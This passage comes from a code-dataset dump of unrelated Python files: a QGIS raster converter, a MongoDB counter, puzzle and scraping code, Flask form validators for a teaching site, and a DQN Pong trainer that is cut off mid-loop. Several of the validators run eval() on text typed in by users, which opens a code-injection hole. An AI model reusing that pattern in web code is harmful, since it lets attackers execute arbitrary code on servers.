bandIndex = selectedLayer.renderer().band()-1 #int\n value = rasterBandVals[bandIndex][int(count/4)] #find in the list and match with color\n\n rendererClasses = selectedLayer.renderer().classes()\n for c in range(len(rendererClasses)-1):\n if value >= rendererClasses[c].value and value <= rendererClasses[c+1].value :\n rgb = rendererClasses[c].color.getRgb()\n color = (rgb[0]<<16) + (rgb[1]<<8) + rgb[2]\n break\n\n elif rendererType == \"singlebandpseudocolor\":\n bandIndex = selectedLayer.renderer().band()-1 #int\n value = rasterBandVals[bandIndex][int(count/4)] #find in the list and match with color\n\n rendererClasses = selectedLayer.renderer().legendSymbologyItems()\n for c in range(len(rendererClasses)-1):\n if value >= float(rendererClasses[c][0]) and value <= float(rendererClasses[c+1][0]) :\n rgb = rendererClasses[c][1].getRgb()\n color = (rgb[0]<<16) + (rgb[1]<<8) + rgb[2]\n break\n\n else:\n if rendererType == \"singlebandgray\":\n bandIndex = selectedLayer.renderer().grayBand()-1\n if rendererType == \"hillshade\":\n bandIndex = selectedLayer.renderer().band()-1\n if rendererType == \"contour\":\n try: bandIndex = selectedLayer.renderer().inputBand()-1\n except:\n try: bandIndex = selectedLayer.renderer().band()-1\n except: bandIndex = 0\n else: # e.g. 
single band data\n bandIndex = 0\n # REMAP band values to (0,255) range\n valRange = (rasterBandMaxVal[bandIndex] - rasterBandMinVal[bandIndex])\n colorVal = int( (rasterBandVals[bandIndex][int(count/4)] - rasterBandMinVal[bandIndex]) / valRange * 255 )\n color = (colorVal<<16) + (colorVal<<8) + colorVal\n\n colors.extend([color,color,color,color])\n count += 4\n\n mesh = rasterToMesh(vertices, faces, colors)\n if(b['displayValue'] is None):\n b['displayValue'] = []\n b['displayValue'].append(mesh)\n return b\n\n\ndef featureToNative(feature: Base):\n feat = QgsFeature()\n try: # ignore 'broken' geometry\n speckle_geom = feature[\"geometry\"]\n if isinstance(speckle_geom, list):\n qgsGeom = geometry.convertToNativeMulti(speckle_geom)\n else:\n qgsGeom = geometry.convertToNative(speckle_geom)\n\n if qgsGeom is not None:\n feat.setGeometry(qgsGeom)\n dynamicProps = feature.get_dynamic_member_names()\n dynamicProps.remove(\"geometry\")\n fields = QgsFields()\n for name in dynamicProps:\n try:\n fields.append(QgsField(name))\n except:\n print(error)\n feat.setFields(fields)\n for prop in dynamicProps:\n feat.setAttribute(prop, feature[prop])\n return feat\n except:\n return \"\"","sub_path":"speckle/converter/layers/feature.py","file_name":"feature.py","file_ext":"py","file_size_in_byte":10106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"599766262","text":"import os,sys\nimport string\nfrom optparse import OptionParser\nimport glob\nimport json\nfrom bson import json_util\nimport pymongo\nfrom pymongo import MongoClient\nimport datetime\n\n\n__version__=\"1.0\"\n__status__ = \"Dev\"\n\n\n\n###############################\ndef main():\n\n\n usage = \"\\n%prog [options]\"\n parser = OptionParser(usage,version=\"%prog version___\")\n parser.add_option(\"-s\",\"--server\",action=\"store\",dest=\"server\",help=\"dev/tst/beta/prd\")\n parser.add_option(\"-c\",\"--coll\",action=\"store\",dest=\"coll\",help=\"\") \n 
(options,args) = parser.parse_args()\n\n for key in ([options.server, options.coll]):\n if not (key):\n parser.print_help()\n sys.exit(0)\n\n server = options.server\n coll = options.coll\n\n config_obj = json.loads(open(\"./conf/config.json\", \"r\").read())\n mongo_port = config_obj[\"dbinfo\"][\"port\"][server]\n mongo_container = \"running_glygen_mongo_%s\" % (server)\n\n host = \"mongodb://127.0.0.1:%s\" % (mongo_port)\n \n db_obj = config_obj[\"dbinfo\"][\"glydb\"]\n db_name, db_user, db_pass = db_obj[\"db\"], db_obj[\"user\"], db_obj[\"password\"]\n\n try:\n client = pymongo.MongoClient(host,\n username=db_user,\n password=db_pass,\n authSource=db_name,\n authMechanism='SCRAM-SHA-1',\n serverSelectionTimeoutMS=10000\n )\n client.server_info()\n dbh = client[db_name]\n n = dbh[coll].count_documents({})\n print (coll, n)\n except pymongo.errors.ServerSelectionTimeoutError as err:\n print (err)\n except pymongo.errors.OperationFailure as err:\n print (err)\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"dump_count.py","file_name":"dump_count.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"544717030","text":"import Readfile as rf\nfrom dateutil import parser\nfrom collections import defaultdict\n\ndef caldulate(data):\n guards = defaultdict(list)\n times = defaultdict(int)\n\n for k in sorted(data):\n time, action = k.split('] ')\n time = parser.parse(time[1:])\n\n if action.startswith('Guard'):\n guard = int(action.split()[1][1:])\n elif action == 'falls asleep':\n start = time\n elif action == 'wakes up':\n end = time\n guards[guard].append((start.minute, end.minute))\n times[guard] += (end-start).seconds\n return guards, times\n\n\ndef part1(data):\n guards, times = caldulate(data)\n (guard, time) = max(times.items(), key=lambda i: i[1])\n (minute, count) = max([(minute, sum(1 for start, end in guards[guard] if start <= minute < end)) for minute in 
range(60)], key=lambda i: i[1])\n return minute * guard\n\n\ndef part2(data):\n guards, times = caldulate(data)\n (guard, minute, count) = max([\n (guard, minute, sum(1 for start, end in guards[guard] if start <= minute < end))\n for minute in range(60) for guard in guards], key=lambda i: i[0])\n return guard * minute\n\n\nif __name__ == '__main__':\n data = rf.read_file('InputFour')\n print(part1(data))\n print(part2(data))\n","sub_path":"AdventOfCode18/Day4/DayFour.py","file_name":"DayFour.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"575308066","text":"import scrapy\nimport re\n\nfrom scrapy.loader.processors import MapCompose, Join, TakeFirst\n\nfilter_list = [\n 'https://',\n 'http://',\n 'www.'\n]\n\n\ndef filter_strip(v):\n for a in filter_list:\n if a in v:\n return ''\n return v.strip()\n\n\ndef filter_pic(v):\n return None if not v else v\n\n\ndef filter_date(v):\n return [re.sub(r'(\\d+)\\.(\\d+)\\.(\\d+) \\((\\d+):(\\d+):(\\d+)\\)', r'\\1-\\2-\\3 \\4:\\5:\\6', a)\n for a in re.findall(r'\\d+\\.\\d+\\.\\d+ \\(\\d+:\\d+:\\d+\\)', v)]\n\n\nclass RetrieverCrawlerItem(scrapy.Item):\n r_id = scrapy.Field()\n media = scrapy.Field()\n title = scrapy.Field(\n input_processor=MapCompose(filter_strip),\n output_processor=TakeFirst()\n ) # 제목\n writer = scrapy.Field(\n input_processor=MapCompose(filter_strip),\n output_processor=TakeFirst()\n ) # 작성자\n category = scrapy.Field(\n output_processor=Join()\n ) # 게시판 분류\n content = scrapy.Field(\n input_processor=MapCompose(filter_strip),\n output_processor=Join()\n ) # 내용\n date = scrapy.Field(\n input_processor=MapCompose(filter_date),\n output_processor=TakeFirst()\n ) # 날짜\n url = scrapy.Field(\n output_processor=Join()\n ) # 게시글 주소\n pic = scrapy.Field(\n input_processor=MapCompose(filter_pic)\n ) # 사진\n 
pass\n","sub_path":"Retriever_Crawler/Retriever_Crawler/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"144470484","text":"# create a function that takes a list and returns a new list with all the elements doubled\n\nlist = [1, 2, 3, 4, 5, 33, 54, 67]\n\ndef double_list(list):\n new_list = []\n for e in list:\n new_list.append(e*2)\n return new_list\n\nprint(double_list(list))\n","sub_path":"week-03/day-3/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"69751247","text":"from wtforms.validators import ValidationError\nfrom static.python.sequence import Sequence\nfrom static.python.phylo import *\n\nfrom random import randrange\nimport re\nimport sre_constants\nfrom static.python.sequence import *\nfrom static.python.phylo import *\nimport string\n\n\nclass CheckRegex(object):\n\n\n def __call__(self, form, field):\n\n if field.data is not None:\n\n correct_seqs = {'chr7:130602946-130603045', 'chr15:5089967-5090066', 'chr19:23226975-23227074'}\n user_seqs = set()\n\n regex = field.data\n\n try:\n tf = re.compile(regex)\n seqs = readFastaFile('chipseq.fa', DNA_Alphabet)\n for seq in seqs:\n seqstr = ''.join(seq.sequence)\n m = tf.match(seqstr)\n if m:\n user_seqs.add(seq.name)\n\n if correct_seqs == user_seqs:\n return\n else:\n\n raise ValidationError('Incorrect. Returning %s sequences %s' % (len(user_seqs), \"\" if len(\n user_seqs) == 0 else \"and they are \" + str(user_seqs) if len(\n user_seqs) < 6 else \" and there are too many to list here.\"))\n except sre_constants.error:\n raise ValidationError(\"The provided regular expression is not valid. 
Try checking your brackets.\")\n\n\nclass CheckList(object):\n \"\"\"\n Custom validator for WTForms to check\n if the correct list was submitted\n \"\"\"\n\n def __init__(self, correct_list):\n self.correct_list = []\n for item in correct_list.split(\",\"):\n self.correct_list.append(item.upper().strip())\n\n def __call__(self, form, field):\n if field.data is not None:\n check_list = []\n for item in field.data.split(\",\"):\n check_list.append(item.upper().strip())\n check_set = set(check_list)\n correct_set = set(self.correct_list)\n\n if len(check_set) > len(correct_set):\n raise ValidationError(\"You have entered too many responses\")\n\n if len(check_set) < len(correct_set):\n raise ValidationError(\"You haven't entered enough responses\")\n\n if len(check_set - correct_set) > 0:\n # Get the original formatting of the response\n incorrect_responses = []\n for item in field.data.split(\",\"):\n if item.upper().strip() in check_set - correct_set:\n incorrect_responses.append(item.strip())\n\n raise ValidationError('The following responses are not correct - {}'.format(', '.join([x for x in incorrect_responses])))\n\n\nclass CorrectAnswer(object):\n \"\"\"\n Custom validator for WTForms to check\n if the correct answer was submitted\n \"\"\"\n\n def __init__(self, answers):\n self.answers = answers\n\n def __call__(self, form, field):\n # List of error messages that are selected by random\n error_messages = ['Sorry, that\\'s not the correct answer.',\n 'Try that again...',\n 'Incorrect answer.',\n 'Please check this answer...',\n 'Oops! Try again...',\n 'Nope! Sorry... try again!',\n 'No, not quite... 
try again!',\n 'Hmmm, not exactly right...']\n num = randrange(0, len(error_messages))\n message = error_messages[num]\n\n if field.data is not None:\n for answer in self.answers:\n if answer.strip().upper() == field.data.strip().upper():\n return\n\n raise ValidationError(message)\n\n\nclass CheckNumberRange(object):\n def __init__(self, lower, upper, hint=\"\"):\n self.lower = lower\n self.upper = upper\n self.hint = hint\n\n def __call__(self, form, field):\n\n if field.data is not None:\n if not (self.lower <= float(field.data) <= self.upper):\n if self.hint:\n raise ValidationError(self.hint)\n else:\n raise ValidationError(\"Not in correct range\")\n\n\nclass CheckAlphabet(object):\n def __call__(self, form, field):\n\n if field.data is not None:\n\n valid = False\n\n invalids = ['J', 'O', 'Z']\n\n valids = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'U', 'V',\n 'W', 'X', 'Y', '-']\n\n if any(x in field.data for x in invalids):\n raise ValidationError(\"Incorrect: Your answer shouldn't contain a J, O, or Z\")\n\n elif any(x for x in field.data if x not in valids):\n raise ValidationError(\n \"Incorrect: Your answer should only contain uppercase alphabetic characters or a gap symbol\")\n\n try:\n seq1 = Sequence(field.data.upper())\n valid = True\n except:\n pass\n if valid:\n raise ValidationError(\"Incorrect: This is a valid sequence\")\n\n\nclass CheckNewick(object):\n def __init__(self, answer):\n self.answer = answer\n\n def __call__(self, form, field):\n\n if field.data is not None:\n try:\n field.data.replace(\" \", \"\")\n newick = parseNewick(field.data)\n newick.canonise()\n if str(newick) != self.answer:\n raise ValidationError(\"This Newick string is not correct.\")\n except:\n raise ValidationError(\"This Newick string is not correct.\")\n\n\nclass CheckThreshold(object):\n def __init__(self, answer, incorrect):\n self.answer = answer\n self.incorrect = incorrect\n\n def __call__(self, form, 
field):\n\n if field.data is not None:\n\n if '.' not in field.data:\n raise ValidationError(\"Your answer is not to three decimal places\")\n\n elif len(field.data.split('.')[1]) != 3:\n raise ValidationError(\"Your answer is not to three decimal places\")\n\n if field.data == self.answer:\n return\n elif field.data == self.incorrect:\n raise ValidationError(\n \"It looks like you've taken the maximum and minimum scores and divided by two. This isn't correct.\")\n else:\n raise ValidationError(\"That isn't the correct threshold\")\n # else:\n # raise ValidationError('This threshold is not correct')\n # except:\n # raise ValidationError(\"That isn't the correct threshold\")\n\n\nclass CheckMotifMatches(object):\n def __init__(self, answer, incorrect):\n self.answer = answer\n self.incorrect = incorrect\n\n def __call__(self, form, field):\n\n if field.data is not None:\n if field.data == self.answer:\n return\n elif field.data == self.incorrect:\n raise ValidationError(\"This answer is incorrect. It looks like you only considered one strand\")\n else:\n raise ValidationError(\"This answer is incorrect\")\n\n\nclass CheckAccuracyScore(object):\n def __init__(self, sens, spec, accur, wanted):\n scores_dict = {}\n scores_dict[sens] = 'Sensitivity'\n scores_dict[spec] = 'Specificity'\n scores_dict[accur] = 'Accuracy'\n self.scores_dict = scores_dict\n self.wanted = wanted\n\n def __call__(self, form, field):\n\n if field.data is not None:\n\n if '.' 
not in field.data:\n raise ValidationError(\"Your answer is not to three decimal places\")\n\n elif len(field.data.split('.')[1]) != 3:\n raise ValidationError(\"Your answer is not to three decimal places\")\n\n for score in self.scores_dict.keys():\n if field.data == score:\n if self.scores_dict[field.data] == self.wanted:\n return\n else:\n raise ValidationError(\n 'You need to provide the {} score but you have provided the {} score'.format(self.wanted,self.scores_dict[field.data]))\n\n else:\n continue\n raise ValidationError('This score is not correct')\n\n\nclass CheckSCIE2100Practical2SeqPairsCode(object):\n\n def __init__(self, answer):\n self.answer = answer\n\n def __call__(self, form, field):\n if field.data is not None:\n numSeqs = 20\n columns = 100\n if \"=\" not in field.data or \"seqPairs\" not in field.data:\n raise ValidationError(\"The format of your answer is incorrect. It should start with seqPairs =\")\n try:\n seqPairs = eval(field.data.split(\"=\")[1])\n if seqPairs != self.answer:\n raise ValidationError(\"This answer is incorrect.\")\n except ValidationError:\n raise ValidationError(\"This answer is incorrect.\")\n except NameError:\n raise ValidationError(\"Make sure you have named your variables correctly\")\n except (ValueError, SyntaxError, TypeError) as e:\n raise ValidationError( \"There was an error in your code - \" + repr(e))\n\n\n\n\n\n\nclass CheckSCIE2100Practical2AAPairsCode(object):\n\n def __init__(self, answer):\n self.answer = answer\n\n def __call__(self, form, field):\n if field.data is not None:\n seqPairs = 190\n columns = 100\n if \"=\" not in field.data or \"aaPairs\" not in field.data:\n raise ValidationError(\"The format of your answer is incorrect. 
It should start with aaPairs = \")\n\n try:\n check = eval(field.data.split(\"=\")[1])\n if check != self.answer:\n raise ValidationError(\"This answer is incorrect.\")\n except ValidationError:\n raise ValidationError(\"This answer is incorrect.\")\n except NameError:\n raise ValidationError(\"Make sure you have named your variables correctly\")\n except (ValueError, SyntaxError, TypeError) as e:\n raise ValidationError( \"There was an error in your code - \" + repr(e))\n\nclass CheckSCIE2100Practical2ProbabilityCode(object):\n\n def __init__(self, answer, identical):\n self.answer = answer\n self.identical = identical\n\n def __call__(self, form, field):\n if field.data is not None:\n a = \"A\"\n b = \"N\"\n\n # Check if a == b\n if self.identical:\n s1 = Sequence('APGNER', Protein_Alphabet)\n s2 = Sequence('APGNER', Protein_Alphabet)\n else: # a != b\n s1 = Sequence('AAPG', Protein_Alphabet)\n s2 = Sequence('ANLP', Protein_Alphabet)\n\n # Create a background Distribution\n b62 = readSubstMatrix('static/python/blosum62.matrix', Protein_Alphabet)\n glob = alignGlobal(s1, s2, b62, -8)\n p = glob.calcBackground()\n\n\n if \"=\" not in field.data or \"eab\" not in field.data:\n raise ValidationError(\"The format of your answer is incorrect. 
It should start with eab = \")\n\n elif \"[\" not in field.data and \".prob\" not in field.data:\n raise ValidationError(\"Are you indexing correctly?\")\n elif \"p\" not in field.data or \"b\" not in field.data or \"a\" not in field.data:\n raise ValidationError(\"Make sure you're using the correct variable names\")\n\n try:\n check = eval(field.data.split(\"=\")[1])\n if check != self.answer:\n raise ValidationError(\"This answer is incorrect.\")\n except ValidationError:\n raise ValidationError(\"This answer is incorrect.\")\n # except NameError:\n # raise ValidationError(\"Make sure you have named your variables correctly\")\n except (AttributeError, ValueError, SyntaxError, TypeError, NameError) as e:\n raise ValidationError( \"There was an error in your code - \" + repr(e))\n\n\n\n\nclass CheckPalindrome(object):\n def __call__(self, form, field):\n if field.data is not None:\n cleaned_data = \"\".join(l for l in field.data.upper() if l not in string.punctuation)\n cleaned_data = cleaned_data.replace(\" \", \"\")\n\n if cleaned_data == cleaned_data[::-1]:\n return\n else:\n raise ValidationError(\"That is not a palindrome\")\n\n\nclass CheckDomainBoundaries(object):\n\n def __init__(self, lower, upper):\n self.lower = lower\n self.upper = upper\n\n def __call__(self, form, field):\n\n if field.data is not None:\n try:\n check_lower = float(field.data.split(\"-\")[0])\n check_upper = float(field.data.split(\"-\")[1])\n\n if check_upper < check_lower:\n raise ValidationError(\"The upper boundary must be higher than the lower boundary\")\n\n if check_upper - check_lower < 10:\n raise ValidationError(\"That domain is too short\")\n\n if check_upper - check_lower > 30:\n raise ValidationError(\"That domain is too long\")\n\n except IndexError:\n raise ValidationError(\"The format you've entered your answer in is incorrect\")\n\n except ValueError as e:\n if str(e).startswith(\"could not convert string to float\"):\n raise ValidationError(\"Make sure you're only 
entering numbers and the - symbol\")\n else:\n raise ValidationError(e)\n\n if not (self.lower <= check_lower < check_upper <= self.upper):\n raise ValidationError(\"These are not the correct domain boundaries\")\n\nclass CheckGapPenalty(object):\n\n def __call__(self, form, field):\n\n if field.data is not None:\n if \".\" in field.data:\n field.data = field.data.split(\".\")[0]\n check = int(field.data)\n if check >= 0:\n raise ValidationError(\"A score of zero or positive will lead to inaccurate, gappy alignments\")\n if check == -1 or check == -2:\n raise ValidationError(\"A score this high would lead to an unusually high number of gaps\")\n if check <= -8:\n\n raise ValidationError(\"A score this low will force a high number of mismatches in the alignment which is not ideal\")\n\n\nclass CompareNumbers(object):\n\n\n def __init__(self, greater):\n self.greater = True if greater == \"greater\" else False\n\n def __call__(self, form, field):\n\n # print ((field.data.split(\",\")[0]).isdigit())\n\n if field.data is not None:\n if \",\" not in field.data:\n raise ValidationError(\"Make sure you seperate your two values with a comma\")\n\n try:\n first = float(field.data.split(\",\")[0])\n second = float(field.data.split(\",\")[1])\n except:\n raise ValidationError(\"Make sure you only enter numbers as your values\")\n\n else:\n correct = (first > second) if self.greater else (first < second)\n\n if correct:\n return\n else:\n raise ValidationError(\"tripletAlignGlobal should take longer than alignGlobal\")\n\n\nclass CheckTripletAlignGlobal(object):\n\n\n def __init__(self, answer, length):\n self.answer = answer\n self.length = length\n\n def __call__(self, form, field):\n if field.data is not None:\n\n N = self.length\n\n if \"=\" not in field.data or \"matrix_size\" not in field.data:\n raise ValidationError(\"The format of your answer is incorrect. 
It should start with matrix_size = \")\n\n elif \"N\" not in field.data:\n raise ValidationError(\"You should be using a variable named N\")\n\n try:\n check = eval(field.data.split(\"=\")[1])\n if check != self.answer:\n raise ValidationError(\"This answer is incorrect.\")\n except ValidationError:\n raise ValidationError(\"This answer is incorrect.\")\n\n except (AttributeError, ValueError, SyntaxError, TypeError, NameError) as e:\n\n raise ValidationError( \"There was an error in your code - \" + repr(e))\n\nclass CheckSelectField(object):\n\n def __init__(self, answer):\n self.answer = answer\n\n def __call__(self, form, field):\n if field.data is not None:\n if field.data == self.answer:\n return\n else:\n raise ValidationError(\"This isn't the correct response\")\n\n\nclass CheckPoissonDistance(object):\n\n\n def __init__(self, answer, fraction_of_positions):\n self.answer = answer\n self.fraction_of_positions = fraction_of_positions\n\n def __call__(self, form, field):\n if field.data is not None:\n\n p = self.fraction_of_positions\n\n if \"=\" not in field.data or \"dist\" not in field.data:\n raise ValidationError(\"The format of your answer is incorrect. 
It should start with dist = \")\n\n elif \"p\" not in field.data:\n raise ValidationError(\"You should be using a variable named p\")\n\n try:\n check = eval(field.data.split(\"=\")[1])\n if check != self.answer:\n raise ValidationError(\"This answer is incorrect.\")\n except ValidationError:\n raise ValidationError(\"This answer is incorrect.\")\n\n except (AttributeError, ValueError, SyntaxError, TypeError, NameError) as e:\n raise ValidationError( \"There was an error in your code - \" + repr(e))\n\n\nclass Unique(object):\n def __init__(self, model, field, message=u'This element already exists.'):\n self.model = model\n self.field = field\n self.message = message\n\n def __call__(self, form, field):\n check = self.model.query.filter(self.field == field.data).first()\n if check:\n raise ValidationError(self.message)","sub_path":"form_validators.py","file_name":"form_validators.py","file_ext":"py","file_size_in_byte":18382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"158785911","text":"import pygame\r\nimport json\r\nclass Options:\r\n def __init__(self,game):\r\n game.setBackground(\"src/image/bg.png\",game.screen)\r\n imageTitre=game.setAnImage(\"src/image/Options.png\",[278, 160],(game.rectBackground.center[0],game.taille[1] - game.taille[1]*0.77),game.screen)\r\n self.boucle=True\r\n self.actualScreen=\"Options\"\r\n BoutonPleinEcran=game.setBouton(\"src/image/BoutonPleinEcran.png\",\"src/image/BoutonPleinEcranHover.png\",\"src/image/BoutonPleinEcranOnClick.png\",[285 , 75],(game.rectBackground.center[0], game.taille[1]-game.taille[1]*0.55),game.screen)\r\n BoutonSons=game.setBouton(\"src/image/BoutonSons.png\",\"src/image/BoutonSonsHover.png\",\"src/image/BoutonSonsOnClick.png\",[285 , 75],(game.rectBackground.center[0], game.taille[1]-game.taille[1]*0.4),game.screen)\r\n 
BoutonReset=game.setBouton(\"src/image/BoutonReset.png\",\"src/image/BoutonResetHover.png\",\"src/image/BoutonResetOnClick.png\",[285 , 75],(game.rectBackground.center[0], game.taille[1]-game.taille[1] * 0.25),game.screen)\r\n BoutonRetour=game.setBouton(\"src/image/BoutonRetour.png\",\"src/image/BoutonRetourHover.png\",\"src/image/BoutonRetourOnClick.png\",[285 , 75],(game.rectBackground.center[0], game.taille[1]-game.taille[1] * 0.11),game.screen)\r\n\r\n pygame.display.flip()\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT: # Si l'event est QUIT alors on quitte la boucle et on ferme la fenetre\r\n self.boucle=False\r\n pygame.quit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n if pygame.mouse.get_focused:\r\n if BoutonRetour[\"bouton\"][\"rect\"].collidepoint(pygame.mouse.get_pos()):\r\n if pygame.mouse.get_pressed()==(True,False,False):\r\n self.actualScreen=\"Menu\"\r\n elif BoutonPleinEcran[\"bouton\"][\"rect\"].collidepoint(pygame.mouse.get_pos()):\r\n if pygame.mouse.get_pressed()==(True,False,False):\r\n pygame.display.toggle_fullscreen()\r\n\r\n elif BoutonReset[\"bouton\"][\"rect\"].collidepoint(pygame.mouse.get_pos()):\r\n if pygame.mouse.get_pressed()==(True,False,False):\r\n niveau = {\r\n \"Niveau1\" : 0,\r\n \"Niveau2\" : 0,\r\n \"Niveau3\" : 0\r\n }\r\n resetFichier = open(\"listeLVL.json\", \"w\")\r\n json.dump(niveau, resetFichier, indent = 4 )\r\n resetFichier.close()","sub_path":"Simulateur/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"317943050","text":"import tensorflow as tf\nimport cv2 # read in pixel data\nimport pong # our class\nimport numpy as np # math\nimport random # random\nfrom collections import deque # queue data structure. fast appends. and pops. 
replay memory\n\n# definine hyperparameters\nACTIONS = 3 # up, down, stay\nGAMMA = 0.99 # define our learning rate\nINITIAL_EPSILON = 1.0 # for updating our gradient or training over time\nFINAL_EPSILON = 0.05 # final value of epsilon\nOBSERVE = 1000 # timesteps to observe before training\nEXPLORE = 1000 # frames over which to anneal epsilon\nREPLAY_MEMORY = 250000 # store our experiences, the size of it (test, how much your ram can fit!)\nBATCH = 32 # batch size to train on\nT_MAX = 1000000 # number of training iterations\nS_MAX = 100 # the score our agent shall reach\n\n# create tensorflow graph\ndef CreateGraph():\n # network weights\n W_conv1 = tf.Variable(tf.truncated_normal([8, 8, 4, 32], stddev=0.01))\n b_conv1 = tf.Variable(tf.constant(0.01, shape=[32]))\n\n W_conv2 = tf.Variable(tf.truncated_normal([4, 4, 32, 64], stddev=0.01))\n b_conv2 = tf.Variable(tf.constant(0.01, shape=[64]))\n\n W_conv3 = tf.Variable(tf.truncated_normal([3, 3, 64, 64], stddev=0.01))\n b_conv3 = tf.Variable(tf.constant(0.01, shape=[64]))\n\n W_fc4 = tf.Variable(tf.truncated_normal([1600, 512], stddev=0.01))\n b_fc4 = tf.Variable(tf.constant(0.01, shape=[512]))\n\n W_fc5 = tf.Variable(tf.truncated_normal([512, ACTIONS], stddev=0.01))\n b_fc5 = tf.Variable(tf.constant(0.01, shape=[ACTIONS]))\n\n # input layer for pixel data\n s = tf.placeholder(\"float\", [None, 80, 80, 4])\n\n # Computes rectified linear unit activation fucntion (relu) on a 2-D convolution given 4-D input and filter tensors\n conv1 = tf.nn.relu(tf.nn.conv2d(s, W_conv1, strides=[1, 4, 4, 1], padding=\"SAME\") + b_conv1)\n pool1 = tf.nn.max_pool(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding=\"SAME\")\n\n conv2 = tf.nn.relu(tf.nn.conv2d(pool1, W_conv2, strides=[1, 2, 2, 1], padding=\"SAME\") + b_conv2)\n conv3 = tf.nn.relu(tf.nn.conv2d(conv2, W_conv3, strides=[1, 1, 1, 1], padding=\"SAME\") + b_conv3)\n\n conv3_flat = tf.reshape(conv3, [-1, 1600])\n fc4 = tf.nn.relu(tf.matmul(conv3_flat, W_fc4) + b_fc4)\n fc5 
= tf.matmul(fc4, W_fc5) + b_fc5\n\n return s, fc5\n\n# deep q network. feed in pixel data to graph session\ndef TrainGraph(inp, out, sess):\n # to calculate the argmax, we multiply the predicted output with a vector with one value 1 and rest as 0\n argmax = tf.placeholder(\"float\", [None, ACTIONS])\n gt = tf.placeholder(\"float\", [None]) #ground truth\n\n # action\n action = tf.reduce_sum(tf.multiply(out, argmax), axis=1)\n # cost function we will reduce through backpropagation\n cost = tf.reduce_mean(tf.square(gt - action))\n # optimization function to reduce our minimize our cost function\n train_step = tf.train.AdamOptimizer(1e-6).minimize(cost)\n\n # initialize our game\n game = pong.PongGame()\n\n # create a queue for experience replay to store policies\n D = deque()\n \n # action do nothing\n argmax_t = np.zeros([ACTIONS])\n argmax_t[0] = 1\n # initial frame\n frame = game.GetFrame(argmax_t)[1]\n # convert rgb to gray scale for processing\n frame = cv2.cvtColor(cv2.resize(frame, (80, 80)), cv2.COLOR_BGR2GRAY)\n # binary colors, black or white\n ret, frame = cv2.threshold(frame, 1, 255, cv2.THRESH_BINARY)\n # stack frames, that is our input tensor\n inp_t = np.stack((frame, frame, frame, frame), axis=2)\n\n # saver\n saver = tf.train.Saver()\n sess.run(tf.global_variables_initializer())\n checkpoint = tf.train.get_checkpoint_state(\"saved_networks\")\n if checkpoint and checkpoint.model_checkpoint_path:\n saver.restore(sess, checkpoint.model_checkpoint_path)\n print(\"Successfully loaded:\", checkpoint.model_checkpoint_path)\n else:\n print(\"Could not find saved networks\")\n\n stats_log = open(\"logs/stats.log\", \"w\")\n # total game score\n score = 0\n\n t = 0\n epsilon = INITIAL_EPSILON\n\n # training time\n while True:\n # output tensor\n out_t = out.eval(feed_dict={ inp: [inp_t] })[0]\n # argmax function\n argmax_t = np.zeros([ACTIONS])\n\n if random.random() <= epsilon or t <= OBSERVE:\n maxIndex = random.randrange(ACTIONS)\n r_dec = \"True\" # 
optional for logging, True if randomly decided\n else:\n maxIndex = np.argmax(out_t)\n r_dec = \"False\"\n argmax_t[maxIndex] = 1\n\n # scale down epsilon\n if epsilon > FINAL_EPSILON and t > OBSERVE:\n epsilon -= (INITIAL_EPSILON - FINAL_EPSILON) / EXPLORE\n\n # reward tensor if score is positive\n reward_t, frame = game.GetFrame(argmax_t)\n # get frame pixel data\n frame = cv2.cvtColor(cv2.resize(frame, (80, 80)), cv2.COLOR_BGR2GRAY)\n ret, frame = cv2.threshold(frame, 1, 255, cv2.THRESH_BINARY)\n frame = np.reshape(frame, (80, 80, 1))\n\n # new input tensor\n inp_t1 = np.append(frame, inp_t[:, :, 0:3], axis=2)\n\n # add our input tensor, argmax tensor, reward and updated tensor to stack of experiences\n D.append((inp_t, argmax_t, reward_t, inp_t1))\n\n # if we run out of replay memory, make room\n if len(D) > REPLAY_MEMORY:\n D.popleft()\n\n # training iteration\n if t > OBSERVE:\n # get values from our replay memory\n minibatch = random.sample(D, BATCH)\n\n inp_batch = [d[0] for d in minibatch]\n argmax_batch = [d[1] for d in minibatch]\n reward_batch = [d[2] for d in minibatch]\n inp_t1_batch = [d[3] for d in minibatch]\n\n gt_batch = []\n out_batch = out.eval(feed_dict={ inp: inp_t1_batch })\n\n # add values to our batch\n for i in range(0, len(minibatch)):\n gt_batch.append(reward_batch[i] + GAMMA * np.max(out_batch[i]))\n\n # train on that\n train_step.run(feed_dict={\n gt: gt_batch,\n argmax: argmax_batch,\n inp: inp_batch\n })\n\n # update our input tensor the next frame\n inp_t = inp_t1\n t += 1\n\n # print out where we are\n if t <= OBSERVE:\n state = \"observe\"\n elif OBSERVE < t < OBSERVE + EXPLORE:\n state = \"explore\"\n else:\n state = \"train\"\n\n score += reward_t\n\n stats = \"TIMESTEP {:7} | SCORE: {: 5} | STATE {:7} | EPSILON {:6.4f} | ACTION {} | R_DEC {:5} | REWARD {:2d} | Q_MAX {: e}\".format(t, score, state, epsilon, maxIndex, r_dec, reward_t, np.max(out_t))\n print(stats)\n # write into file\n stats_log.write(stats + \"\\n\")\n\n #save 
